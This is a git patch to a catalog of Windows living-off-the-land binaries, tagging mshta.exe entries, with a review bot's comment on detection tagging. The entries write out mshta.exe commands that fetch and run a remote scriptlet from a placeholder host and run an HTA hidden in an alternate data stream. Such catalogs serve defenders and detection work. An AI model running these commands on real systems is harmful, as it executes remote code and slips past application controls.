From bd07c4dd2433f1f6790ecc90fde6cdea64e2bfcd Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:03:39 +0200 Subject: [PATCH] Update Mshta.yml Tags Added Tags: Execute: Remote Input Custom Format Execute JScript Execute VBScript --- yml/OSBinaries/Mshta.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 8a3de9f..a3d4fde 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -13,6 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH + - Execute: Remote + - Input: Custom Format - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: VBScript - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code @@ -27,6 +31,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream
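Review bot: The second and third hunks tag the `vbscript:` and `javascript:` entries only with `Execute: VBScript` and `Execute: JScript`, although both command lines load a scriptlet from `https://webserver/payload.sct` through `GetObject("script:...")`. The first hunk adds `- Execute: Remote` to the entry above them, so these two entries probably deserve the same tag; without it, anyone filtering the catalog by the Remote tag to scope detection coverage for network-fetching mshta.exe invocations would miss them. The proposed addition under each new `Tags:` list is `- Execute: Remote`. The entry touched by the first hunk starts above the hunk, so its command line is not visible here and I cannot confirm that `Execute: Remote` and `Input: Custom Format` fit it.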